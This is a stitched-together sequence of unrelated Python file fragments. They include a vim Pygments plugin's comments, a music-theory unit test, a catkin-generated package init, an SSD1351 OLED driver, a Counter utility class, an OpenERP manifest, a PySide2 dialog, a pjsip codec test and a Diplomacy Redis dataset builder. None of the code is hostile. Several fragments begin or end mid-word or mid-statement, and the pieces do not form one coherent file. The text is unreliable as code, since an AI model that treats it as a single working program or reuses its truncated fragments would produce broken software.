hlight group will probably exist (assuming the colorscheme # defines it), but "pythonComment" will not. # This isn't great, because I want to maintain the ability of users to modify individual # language highlight groups if they feel like it # I am not going to worry about this just yet, but I will need to find a way to address this eventually # For now, my solution is to just not use those language specific groups while I get the basics working # Also, it would be really swell if I didn't have to write this code for every single languages someone # might edit in vim. Actually, that's really the only way to do it. # I need to make the core functionality as generic as possible, while having an easy way to override settings # for a specific language if the generic way just won't work in all edge cases # This should be possible both within this python code, and from vimscript # entire file is sent to pygments in a single big list, so column indexes are relative to the entire file, not per line # keep track of the last index where a newline was found # the index for the 0th column for the next line will be 1 after the lastnewlineindex # at the same time, also track line numbers # TODO newlines are their own tokens in python, but not in bash, and probably other languages # I assume any language where newlines don't have semantic meaning won't have them as tokens # need to find a better way to keep track of line numbers # shit. # so i can either override each lexer that doesn't have newlines as tokens, see here: # http://pygments.org/docs/lexerdevelopment/#modifying-token-streams # or, note down the byte index of newlines in the fullbuf stream and work with that # first method might be marginally faster, but is so ugly it makes me want to cry # probably will go with second method. if value == '\n': linenum += 1 lastnewlineindex = index # self.msg('found newline') elif tokentype in self.pygmap: colstart = index - (lastnewlineindex + 1)
import unittest import logging from harmoniccontext.harmonic_context import HarmonicContext from harmoniccontext.harmonic_context_track import HarmonicContextTrack from harmonicmodel.secondary_chord_template import SecondaryChordTemplate from harmonicmodel.tertian_chord_template import TertianChordTemplate from structure.LineGrammar.core.line_grammar_executor import LineGrammarExecutor from structure.line import Line from structure.note import Note from timemodel.duration import Duration from tonalmodel.diatonic_foundation import DiatonicFoundation from tonalmodel.modality import ModalityType from tonalmodel.tonality import Tonality from transformation.reflection.t_chromatic_reflection import TChromaticReflection from misc.interval import Interval from tonalmodel.diatonic_pitch import DiatonicPitch from fractions import Fraction class TestTChromaticFlip(unittest.TestCase): logging.basicConfig(level=logging.DEBUG) def setUp(self): pass def tearDown(self): pass def test_hct_rebuild_perfect_overlap(self): print('----- test_hct_rebuild_perfect_overlap -----') line_str = '{<C-Major: I> hA:5 <:IV> B qC G <:VI> hD}' lge = LineGrammarExecutor() target_line, target_hct = lge.parse(line_str) print('--- before transformation ---') TestTChromaticFlip.print_notes(target_line) TestTChromaticFlip.print_hct(target_hct) cue = DiatonicPitch(5, 'c') f = TChromaticReflection(target_line, target_hct, cue) temporal_extent = Interval(Fraction(1, 2), Fraction(3, 2)) score_line, score_hct = f.apply(temporal_extent, cue) print('--- after transformation ---') TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) print('--- transformation ---') TestTChromaticFlip.print_function(f, target_hct) notes = score_line.get_all_notes() assert 'Db:4' == str(notes[1].diatonic_pitch) assert 'C:5' == str(notes[2].diatonic_pitch) assert 'F:4' == str(notes[3].diatonic_pitch) hc_list = score_hct.hc_list() assert len(hc_list) == 3 assert hc_list[1].chord.chord_template.scale_degree == 1 assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'G', 'C', 'Eb'} assert hc_list[1].chord.chord_template.inversion == 3 def test_mozart(self): print('----- Mozart -----') line_str = '{<C-Major: I> hC:5 qE G <:VMaj7> q@b:4 sC:5 D <:I> hC}' lge = LineGrammarExecutor() target_line, target_hct = lge.parse(line_str) print('--- before transformation ---') TestTChromaticFlip.print_notes(target_line) TestTChromaticFlip.print_hct(target_hct) cue = Dia
tonicPitch(5, 'c') f = TChromaticReflection(target_line, target_hct, cue) score_line, score_hct = f.apply() print('--- after transformation ---') TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) print('--- transformation ---') TestTChromaticFlip.print_function(f, targ
et_hct) notes = score_line.get_all_notes() assert 'C:5' == str(notes[0].diatonic_pitch) assert 'Ab:4' == str(notes[1].diatonic_pitch) assert 'F:4' == str(notes[2].diatonic_pitch) assert 'Db:5' == str(notes[3].diatonic_pitch) assert 'C:5' == str(notes[4].diatonic_pitch) assert 'Bb:4' == str(notes[5].diatonic_pitch) assert 'C:5' == str(notes[6].diatonic_pitch) hc_list = score_hct.hc_list() assert len(hc_list) == 3 assert hc_list[0].chord.chord_template.scale_degree == 4 assert {t[0].diatonic_symbol for t in hc_list[0].chord.tones} == {'C', 'F', 'Ab'} assert hc_list[0].chord.chord_template.inversion == 3 assert hc_list[1].chord.chord_template.scale_degree == 7 assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'F', 'Bb', 'Db', 'Gb'} assert hc_list[1].chord.chord_template.inversion == 3 assert hc_list[2].chord.chord_template.scale_degree == 4 assert {t[0].diatonic_symbol for t in hc_list[2].chord.tones} == {'C', 'F', 'Ab'} assert hc_list[2].chord.chord_template.inversion == 3 def test_secondary_chord(self): print('----- test_secondary_tonality -----') diatonic_tonality = Tonality.create(ModalityType.Major, DiatonicFoundation.get_tone("C")) chort_t_i = TertianChordTemplate.parse('tI') chord_i = chort_t_i.create_chord(diatonic_tonality) chord_v_ii = SecondaryChordTemplate.parse('V/ii').create_chord(diatonic_tonality) chord_vi_v = SecondaryChordTemplate.parse('vi/V').create_chord(diatonic_tonality) chord_t_ii = TertianChordTemplate.parse('tii') chord_ii = chord_t_ii.create_chord(diatonic_tonality) hc_track = HarmonicContextTrack() hc_track.append(HarmonicContext(diatonic_tonality, chord_i, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_v_ii, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_vi_v, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_ii, Duration(1))) TestTChromaticFlip.print_hct(hc_track) tune = [('C:5', (1, 1)), ('E:5', (1, 1)), ('E:5', (1, 1)), ('G:5', (1, 1))] line = TestTChromaticFlip.build_line(tune) cue = DiatonicPitch(5, 'd') tflip = TChromaticReflection(line, hc_track, cue) temporal_extent = Interval(Fraction(0), Fraction(4)) score_line, score_hct = tflip.apply() TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) @staticmethod def print_hct(hct): hcs = hct.hc_list() index = 0 for hc in hcs: print('[{0}] {1} {2}'.format(index, hc, hc.position)) index += 1 print("--------") @staticmethod def print_notes(line): for note in line.get_all_notes(): print(note) print("--------") @staticmethod def print_map(f, source_hct, cue): for hc in source_hct.hc_list(): if hc in f.hc_flip_map: pitch_map = f.hc_flip_map[hc] map_list = list() for tone in pitch_map.domain_tonality.annotation[:-1]: ft = pitch_map.tonal_function[tone] map_list.append('{0}-->{1}'.format(tone.diatonic_symbol, ft.diatonic_symbol)) print('[{0}] ({1}) {2}'.format(hc, pitch_map.range_tonality, ', '.join([s for s in map_list]))) @staticmethod def print_function(f, source_hct): for hc in source_hct.hc_list(): if hc in f.hc_flip_map: pitch_map = f.hc_flip_map[hc] domain = sorted([p for p in pitch_map.domain], key=lambda p: p.chromatic_distance) domain_tones = pitch_map.domain_tonality.annotation[:-1] map_list = list() for p in domain: r = pitch_map[p] if p.diatonic_tone in domain_tones: map_list.append('{0} --> {1}'.format(p, r)) print('[{0}] ({1}) {2}: {3}'.format(pitch_map.domain_tonality, pitch_map.cue_pitch, pitch_map.range_tonality, ', '.join([s for s in map_list]) ) ) @staticmethod def build_line(note_spec_list): note_list = list() for spec in note_spec_list: pitch = DiatonicPitch.parse(spec[0]) n = Note(pitch, Duration(spec[1][0], spec[1][1])) note_list.append(n) return Line(note_list)
# generated from catkin/cmake/template/__init__.py.in # keep symbol table as clean as possible by deleting all unnecessary symbols from os import path as os_path from sys import path as sys_path from pkgutil import extend_path __extended_path = "/home/rss-student/rss-2014-team-3/src/robotbrain/src".split(";") for p in reversed(__extended_path): sys_path.insert(0, p) del p del sys_path __path__ = extend_path(__path__, __name__) del extend_path __execfiles = [] for p in __extended_path: src_init_file = os_path.join(p, __name__ + '.py') if os_path.isfile(src_init_file): __execfiles.append(src_init_file) else: src_init_file = os_path.join(p, __name
__, '__init__.py')
if os_path.isfile(src_init_file): __execfiles.append(src_init_file) del src_init_file del p del os_path del __extended_path for __execfile in __execfiles: with open(__execfile, 'r') as __fh: exec(__fh.read()) del __fh del __execfile del __execfiles
# Constants SSD1351_I2C_ADDRESS = 0x3C # 011110+SA0+RW - 0x3C or 0x3D SSD1351_SETCONTRAST = 0x81 SSD1351_DISPLAYALLON_RESUME = 0xA4 SSD1351_DISPLAYALLON = 0xA5 SSD1351_NORMALDISPLAY = 0xA6 SSD1351_INVERTDISPLAY = 0xA7 SSD1351_DISPLAYOFF = 0xAE SSD1351_DISPLAYON = 0xAF SSD1351_SETDISPLAYOFFSET = 0xD3 SSD1351_SETCOMPINS = 0xDA SSD1351_SETVCOMDETECT = 0xDB SSD1351_SETDISPLAYCLOCKDIV = 0xD5 SSD1351_SETPRECHARGE = 0xD9 SSD1351_SETMULTIPLEX = 0xA8 SSD1351_SETLOWCOLUMN = 0x00 SSD1351_SETHIGHCOLUMN = 0x10 SSD1351_SETSTARTLINE = 0x40 SSD1351_MEMORYMODE = 0x20 SSD1351_COLUMNADDR = 0x21 SSD1351_PAGEADDR = 0x22 SSD1351_COMSCANINC = 0xC0 SSD1351_COMSCANDEC = 0xC8 SSD1351_SEGREMAP = 0xA0 SSD1351_CHARGEPUMP = 0x8D SSD1351_EXTERNALVCC = 0x1 SSD1351_SWITCHCAPVCC = 0x2 # Scrolling constants SSD1351_ACTIVATE_SCROLL = 0x2F SSD1351_DEACTIVATE_SCROLL = 0x2E SSD1351_SET_VERTICAL_SCROLL_AREA = 0xA3 SSD1351_RIGHT_HORIZONTAL_SCROLL = 0x26 SSD1351_LEFT_HORIZONTAL_SCROLL = 0x27 SSD1351_VERTICAL_AND_RIGHT_HORIZONTAL_SCROLL = 0x29 SSD1351_VERTICAL_AND_LEFT_HORIZONTAL_SCROLL = 0x2A #? SSD1351_DELAYS_HWFILL (3) #? SSD1351_DELAYS_HWLINE (1) # SSD1351 Commands SSD1351_SETCOLUMN = 0x15 SSD1351_SETROW = 0x75 SSD1351_WRITERAM = 0x5C SSD1351_READRAM = 0x5D SSD1351_SETREMAP = 0xA0 SSD1351_STARTLINE = 0xA1 SSD1351_DISPLAYOFFSET = 0xA2 SSD1351_DISPLAYALLOFF = 0xA4 SSD1351_DISPLAYALLON = 0xA5 SSD1351_NORMALDISPLAY = 0xA6 SSD1351_INVERTDISPLAY = 0xA7 SSD1351_FUNCTIONSELECT = 0xAB SSD1351_DISPLAYOFF = 0xAE SSD1351_DISPLAYON = 0xAF SSD1351_PRECHARGE = 0xB1 SSD1351_DISPLAYENHANCE = 0xB2 SSD1351_CLOCKDIV = 0xB3 SSD1351_SETVSL = 0xB4 SSD1351_SETGPIO = 0xB5 SSD1351_PRECHARGE2 = 0xB6 SSD1351_SETGRAY = 0xB8 SSD1351_USELUT = 0xB9 SSD1351_PRECHARGELEVEL = 0xBB SSD1351_VCOMH = 0xBE SSD1351_CONTRASTABC = 0xC1 SSD1351_CONTRASTMASTER = 0xC7 SSD1351_MUXRATIO = 0xCA SSD1351_COMMANDLOCK = 0xFD SSD1351_HORIZSCROLL = 0x96 SSD1351_STOPSCROLL = 0x9E SSD1351_STARTSCROLL = 0x9F class SSD1351Base(object): """Base class for SSD1351-based OLED displays. Implementors should subclass and provide an implementation for the _initialize function. """ def __init__(self, width, height, rst, dc=None, sclk=None, din=None, cs=None, gpio=None, spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS, i2c=None): self._log = logging.getLogger('Adafruit_SSD1351.SSD1351Base') self._spi = None self._i2c = None self.width = width self.height = height self._pages = height/8 self._buffer = [0]*(width*height) # Default to platform GPIO if not provided. self._gpio = gpio if self._gpio is None: self._gpio = GPIO.get_platform_gpio() # Setup reset pin. self._rst = rst self._gpio.setup(self._rst, GPIO.OUT) # Handle hardware SPI if spi is not None: self._log.debug('Using hardware SPI') self._spi = spi self._spi.set_clock_hz(8000000) # Handle software SPI elif sclk is not None and din is not None and cs is not None: self._log.debug('Using software SPI') self._spi = SPI.BitBang(self._gpio, sclk, din, None, cs) # Handle hardware I2C elif i2c is not None: self._log.debug('Using hardware I2C with custom I2C provider.') self._i2c = i2c.get_i2c_device(i2c_address) else: self._log.debug('Using hardware I2C with platform I2C provider.') import Adafruit_GPIO.I2C as I2C if i2c_bus is None: self._i2c = I2C.get_i2c_device(i2c_address) else: self._i2c = I2C.get_i2c_device(i2c_address, busnum=i2c_bus) # Initialize DC pin if using SPI. if self._spi is not None: if dc is None: raise ValueError('DC pin must be provided when using SPI.') self._dc = dc self._gpio.setup(self._dc, GPIO.OUT) def _initialize(self): raise NotImplementedError def command(self, c): """Send command byte to display.""" if self._spi is not None: # SPI write. self._gpio.set_low(self._dc) self._spi.write([c]) else: # I2C write. control = 0x00 # Co = 0, DC = 0 self._i2c.write8(control, c) def data(self, c): """Send byte of data to display.""" if self._spi is not None: # SPI write. self._gpio.set_high(self._dc) self._spi.write([c]) else: # I2C write. control = 0x40 # Co = 0, DC = 0 self._i2c.write8(control, c) def begin(self, vccstate=SSD1351_SWITCHCAPVCC): """Initialize display.""" # Save vcc state. self._vccstate = vccstate # Reset and initialize display. self.reset() self._initialize() # Turn on the display. self.command(SSD1351_DISPLAYON) def reset(self): """Reset the display.""" # Set reset high for a millisecond. self._gpio.set_high(self._rst) time.sleep(0.001) # Set reset low for 10 milliseconds. self._gpio.set_low(self._rst) time.sleep(0.010) # Set reset high again. self._gpio.set_high(self._rst) def display(self): """Write display buffer to physical display.""" self.command(SSD1351_SETCOLUMN) self.data(0) # Column start address. (0 = reset) self.data(self.width-1) # Column end address. self.command(SSD1351_SETROW) self.data(0) # Page start address. (0 = reset) self.data(self.height-1) # Page end address. # Write buffer data. if self._spi is not None: # Set DC high for data. self._gpio.set_high(self._dc) # Write buffer. self.command(SSD1351_WRITERAM) self._spi.write(self._buffer) else: for i in range(0, len(self._buffer), 16): control = 0x40 # Co = 0, DC = 0 self._i2c.writeList(control, self._buffer[i:i+16]) def image(self, image): """Set buffer to value of Python Imaging Library image. The image should be in 1 bit mode and a size equal to the display size. """ # if image.mode != '1': # raise ValueError('Image must be in mode 1.') imwidth, imheight = image.size if imwidth != self.width or imheight != self.height: raise ValueError('Image must be same dimensions as display ({0}x{1}).' \ .format(self.width, self.height)) # Grab all the pixels from the image, faster than getpixel. pix = image.load() # Iterate through the memory pages index = 0 for page in range(self.height): # Iterate through all x axis columns. for x in range(self.width): # Set the bits for the column of pixels at the current position. bits = 0 # Don't use range here as it's a bit slow for bit in [0, 1, 2, 3, 4, 5, 6, 7]: bits = bits << 1 bits |= 0 if pix[(x, page*8+7-bit)] == 0 else 1 # Update buffer byte and increment to next byte. self._buffer[index] = bits index += 1 def clear(self): """Clear contents of image buffer.""" self._buffer = [0]*(self.width*self.height) def set_contrast(self, contrast): """Sets the contr
ast of the display. Contrast
should be a value between 0 and 255.""" if contrast < 0 or contrast > 255: raise ValueError('Contrast must be a value from 0 to 255 (inclusive).') self.command(SSD1351_CONTRASTMASTER) self.command(contrast) def dim(self, dim): """Adjusts contrast to dim the display if dim is True, otherwise sets the contrast to normal brightness if dim is False. """ # Assume dim display. contrast = 0 # Adjust contrast based on VCC if not dimming. if not dim: if self._vccstate == SSD1351_EXTERNALVCC: contrast = 0x9F else: contrast = 0xCF def invert(self): self.command(SSD1351_NORMALDISPLAY) def rawfill(self, x, y, w, h, fillcolor): if (x >= self.width) or (y >= self.height): return if y+h > self.height: h = self.height-y-1 if x+w > self.width: w = self.width-x-1 self.command(SSD1351_SETCOLUMN) self.data(x) self.data(x+w-1) self.command(SSD1351_SETROW) self.data(y) self.data(y+h-1) #fill! self.command(SSD1351_WRITERAM) for num in range (0, w*h): self.data(fillcolor >> 8) self.data(fillcolor) def color565(self, r, g, b): c = r >> 3 c <<= 6 c |= g >> 2 c <<= 5 c |= b >> 3 return c def roughimage(self, image): self.command(SSD1351_SETCOLUMN) self.data(0) self.data(self.width - 1) self.command(SSD1351_SETROW) self.data(0) self.data(self.height-1) #fill im_width, im_height = image.size print(im_width, im_height) rgb_image = image.convert('RGB') pix = rg
+= 1 def pop(self): (_, _, item) = heapq.heappop(self.heap) # (_, item) = heapq.heappop(self.heap) return item def isEmpty(self): return len(self.heap) == 0 class PriorityQueueWithFunction(PriorityQueue): """ Implements a priority queue with the same push/pop signature of the Queue and the Stack classes. This is designed for drop-in replacement for those two classes. The caller has to provide a priority function, which extracts each item's priority. """ def __init__(self, priorityFunction): "priorityFunction (item) -> priority" self.priorityFunction = priorityFunction # store the priority function PriorityQueue.__init__(self) # super-class initializer def push(self, item): "Adds an item to the queue with priority from the priority function" PriorityQueue.push(self, item, self.priorityFunction(item)) def manhattanDistance( xy1, xy2 ): "Returns the Manhattan distance between points xy1 and xy2" return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] ) """ Data structures and functions useful for various course projects The search project should not need anything below this line. """ class Counter(dict): """ A counter keeps track of counts for a set of keys. The counter class is an extension of the standard python dictionary type. It is specialized to have number values (integers or floats), and includes a handful of additional functions to ease the task of counting data. In particular, all keys are defaulted to have value 0. Using a dictionary: a = {} print a['test'] would give an error, while the Counter class analogue: >>> a = Counter() >>> print a['test'] 0 returns the default 0 value. Note that to reference a key that you know is contained in the counter, you can still use the dictionary syntax: >>> a = Counter() >>> a['test'] = 2 >>> print a['test'] 2 This is very useful for counting things without initializing their counts, see for example: >>> a['blah'] += 1 >>> print a['blah'] 1 The counter also includes additional functionality useful in implementing the classifiers for this assignment. Two counters can be added, subtracted or multiplied together. See below for details. They can also be normalized and their total count and arg max can be extracted. """ def __getitem__(self, idx): self.setdefault(idx, 0) return dict.__getitem__(self, idx) def incrementAll(self, keys, count): """ Increments all elements of keys by the same count. >>> a = Counter() >>> a.incrementAll(['one','two', 'three'], 1) >>> a['one'] 1 >>> a['two'] 1 """ for key in keys: self[key] += count def argMax(self): """ Returns the key with the highest value. """ if len(self.keys()) == 0: return None all = self.items() values = [x[1] for x in all] maxIndex = values.index(max(values)) return all[maxIndex][0] def sortedKeys(self): """ Returns a list of keys sorted by their values. Keys with the highest values will appear first. >>> a = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> a['third'] = 1 >>> a.sortedKeys() ['second', 'third', 'first'] """ sortedItems = self.items() compare = lambda x, y: sign(y[1] - x[1]) sortedItems.sort(cmp=compare) return [x[0] for x in sortedItems] def totalCount(self): """ Returns the sum of counts for all keys. """ return sum(self.values()) def normalize(self): """ Edits the counter such that the total count of all keys sums to 1. The ratio of counts for all keys will remain the same. Note that normalizing an empty Counter will result in an error. """ total = float(self.totalCount()) if total == 0: return for key in self.keys(): self[key] = self[key] / total def divideAll(self, divisor): """ Divides all counts by divisor """ divisor = float(divisor) for key in self: self[key] /= divisor def copy(self): """ Returns a copy of the counter """ return Counter(dict.copy(self)) def __mul__(self, y ): """ Multiplying two counters gives the dot product of their vectors where each unique label is a vector element. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['second'] = 5 >>> a['third'] = 1.5 >>> a['fourth'] = 2.5 >>> a * b 14 """ sum = 0 x = self if len(x) > len(y): x,y = y,x for key in x: if key not in y: continue sum += x[key] * y[key] return sum def __radd__(self, y): """ Adding another counter to a counter increments the current counter by the values stored in the second counter. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> a += b >>> a['first'] 1 """ for key, value in y.items(): self[key] += value def __add__( self, y ): """ Adding two counters gives a counter with the union of all keys and counts of the second added to counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a + b)['first'] 1 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] + y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = y[key] return addend def __sub__( self, y ): """ Subtracting a counter from another gives a counter with the union of all keys and counts of the second subtracted from counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a - b)['first'] -5 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] - y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = -1 * y[key] return addend def raiseNotDefined(): fileName = inspect.stack()[1][1] line = inspect.stack()[1][2] method = inspect.stack()[1][3] print "*** Method
not implemented: %s at line %s of %s" % (method, line, fileName) sys.exit(1) def normalize(vectorOrCounter): """ normalize a vector or counter by dividing each value by the sum of all values """ normalizedCounter = Counter() if type(vectorOrCounter) == type(normalizedCounter): counter = vectorOrCounter total = float(counter.totalCount()) if total == 0: return counter for key in counter.keys():
value = counter[key] normalizedCounter[key] = value / total return normalizedCounter else: vector = vectorOrCounter s = float(sum(vector)) if s == 0: return vector return [el / s for el in vector] def nSample(distribution, values, n): if sum(distribution) != 1: distribution = normalize(distribution) rand = [random.random() for i in range(n)] rand.sort() samples = [] samplePos, distPos,
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warr
anty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Attendances', 'version': '1.1', 'category': 'Human Resour
ces', 'description': """ This module aims to manage employee's attendances. ================================================== Keeps account of the attendances of the employees on the basis of the actions(Sign in/Sign out) performed by them. """, 'author': 'OpenERP SA', 'images': ['images/hr_attendances.jpeg'], 'depends': ['hr'], 'data': [ 'security/ir_rule.xml', 'security/ir.model.access.csv', 'hr_attendance_view.xml', 'hr_attendance_report.xml', 'wizard/hr_attendance_bymonth_view.xml', 'wizard/hr_attendance_byweek_view.xml', 'wizard/hr_attendance_error_view.xml', 'res_config_view.xml', ], 'demo': ['hr_attendance_demo.xml'], 'test': [ 'test/attendance_process.yml', 'test/hr_attendance_report.yml', ], 'installable': True, 'auto_install': False, #web "js": ["static/src/js/attendance.js"], 'qweb' : ["static/src/xml/attendance.xml"], 'css' : ["static/src/css/slider.css"], } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'replace_with_ref_dialog_ui.ui' # # Created: Fri Nov 18 22:58:33 2016 # by: pyside2-uic running on PySide2 2.0.0~alpha0 # # WARNING! All changes made in this file will be lost! from PySide2 import QtCore, QtGui, QtWidgets class Ui_Dialog(object): def setupUi(self, Dialog): Dialog.setObjectName("Dialog") Dialog.resize(520, 174) self.verticalLayout = QtWidgets.QVBoxLayout(Dialog) self.verticalLayout.setContentsMargins(6, 6, 6, 6) self.verticalLayout.setObjectName("verticalLayout") self.groupBox = QtWidgets.QGroupBox(Dialog) self.groupBox.setTitle("") self.groupBox.setObjectName("groupBox") self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox) self.horizontalLayout.setObjectName("horizontalLayout") self.uiLBL_text = QtWidgets.QLabel(self.groupBox) self.uiLBL_text.setTextFormat(QtCore.Qt.RichText) self.uiLBL_text.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop) self.uiLBL_text.setWordWrap(True) self.uiLBL_text.setObjectName("uiLBL_text")
self.horizontalLayout.addWidget(self.uiLBL_text) self.verticalLayout.addWidget(self.groupBox) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalL
ayout_2.addItem(spacerItem) self.uiBTN_saveReplace = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_saveReplace.sizePolicy().hasHeightForWidth()) self.uiBTN_saveReplace.setSizePolicy(sizePolicy) self.uiBTN_saveReplace.setObjectName("uiBTN_saveReplace") self.horizontalLayout_2.addWidget(self.uiBTN_saveReplace) self.uiBTN_replace = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_replace.sizePolicy().hasHeightForWidth()) self.uiBTN_replace.setSizePolicy(sizePolicy) self.uiBTN_replace.setObjectName("uiBTN_replace") self.horizontalLayout_2.addWidget(self.uiBTN_replace) self.uiBTN_cancel = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_cancel.sizePolicy().hasHeightForWidth()) self.uiBTN_cancel.setSizePolicy(sizePolicy) self.uiBTN_cancel.setObjectName("uiBTN_cancel") self.horizontalLayout_2.addWidget(self.uiBTN_cancel) spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem1) self.horizontalLayout_2.setStretch(1, 1) self.horizontalLayout_2.setStretch(2, 1) self.horizontalLayout_2.setStretch(3, 1) self.verticalLayout.addLayout(self.horizontalLayout_2) self.verticalLayout.setStretch(0, 1) self.retranslateUi(Dialog) QtCore.QObject.connect(self.uiBTN_saveReplace, QtCore.SIGNAL("clicked()"), Dialog.onSaveReplaceClicked) QtCore.QObject.connect(self.uiBTN_replace, QtCore.SIGNAL("clicked()"), Dialog.onReplaceClicked) QtCore.QObject.connect(self.uiBTN_cancel, QtCore.SIGNAL("clicked()"), Dialog.onCancelClicked) QtCore.QObject.connect(Dialog, QtCore.SIGNAL("finished(int)"), Dialog.onDialogFinished) QtCore.QMetaObject.connectSlotsByName(Dialog) def retranslateUi(self, Dialog): Dialog.setWindowTitle(QtWidgets.QApplication.translate("Dialog", "Replace With Reference", None, -1)) self.uiLBL_text.setText(QtWidgets.QApplication.translate("Dialog", "Text", None, -1)) self.uiBTN_saveReplace.setText(QtWidgets.QApplication.translate("Dialog", "Save and Replace", None, -1)) self.uiBTN_replace.setText(QtWidgets.QApplication.translate("Dialog", "Replace", None, -1)) self.uiBTN_cancel.setText(QtWidgets.QApplication.translate("Dialog", "Cancel", None, -1))
# $Id: 201_codec_l16_160
00.py 369517 2012-07-01 17:28:57Z file $ # from inc_cfg import * # Call with L16/16000/1 codec test_param = TestParam
( "PESQ codec L16/16000/1 (RX side uses snd dev)", [ InstanceParam("UA1", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --play-file wavs/input.16.wav --null-audio"), InstanceParam("UA2", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --rec-file wavs/tmp.16.wav --auto-answer 200") ] ) if (HAS_SND_DEV == 0): test_param.skip = True pesq_threshold = 3.5
# ============================================================================== # Copyright 2019 - Philip Paquette # # NOTICE: Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # =========================================================================
===== """ Redis dataset - Populated the Redis server with the supervised games - Saves the redis database on disk for faster boot time. """ import logging import os import pickle import shutil from threading import Thread from tqdm import tqdm from diplomacy_research.models.training.memory_buffer import MemoryBuffer from diplomacy_research.models
.training.memory_buffer.expert_games import save_expert_games from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto from diplomacy_research.utils.process import start_redis from diplomacy_research.utils.proto import bytes_to_zlib, bytes_to_proto, read_next_bytes from diplomacy_research.settings import PROTO_DATASET_PATH, REDIS_DATASET_PATH, WORKING_DIR, \ PHASES_COUNT_DATASET_PATH, IN_PRODUCTION # Constants LOGGER = logging.getLogger(__name__) def run(**kwargs): """ Run the script - Determines if we need to build the dataset or not. """ del kwargs # Unused args if os.path.exists(REDIS_DATASET_PATH): LOGGER.info('... Dataset already exists. Skipping.') else: build() def build(): """ Building the Redis dataset """ if not os.path.exists(PROTO_DATASET_PATH): raise RuntimeError('Unable to find the proto dataset at %s' % PROTO_DATASET_PATH) # Creating output directory if it doesn't exist os.makedirs(os.path.join(WORKING_DIR, 'containers', 'redis'), exist_ok=True) # Starting the Redis server and blocking on that thread redis_thread = Thread(target=start_redis, kwargs={'save_dir': os.path.join(WORKING_DIR, 'containers'), 'log_file_path': os.devnull, 'clear': True}) redis_thread.start() # Creating a memory buffer object to save games in Redis memory_buffer = MemoryBuffer() memory_buffer.clear() # Loading the phases count dataset to get the number of games total = None if os.path.exists(PHASES_COUNT_DATASET_PATH): with open(PHASES_COUNT_DATASET_PATH, 'rb') as file: total = len(pickle.load(file)) progress_bar = tqdm(total=total) # Loading dataset and converting LOGGER.info('... Creating redis dataset.') with open(PROTO_DATASET_PATH, 'rb') as file: while True: saved_game_bytes = read_next_bytes(file) if saved_game_bytes is None: break progress_bar.update(1) saved_game_proto = bytes_to_proto(saved_game_bytes, SavedGameProto) save_expert_games(memory_buffer, [bytes_to_zlib(saved_game_bytes)], 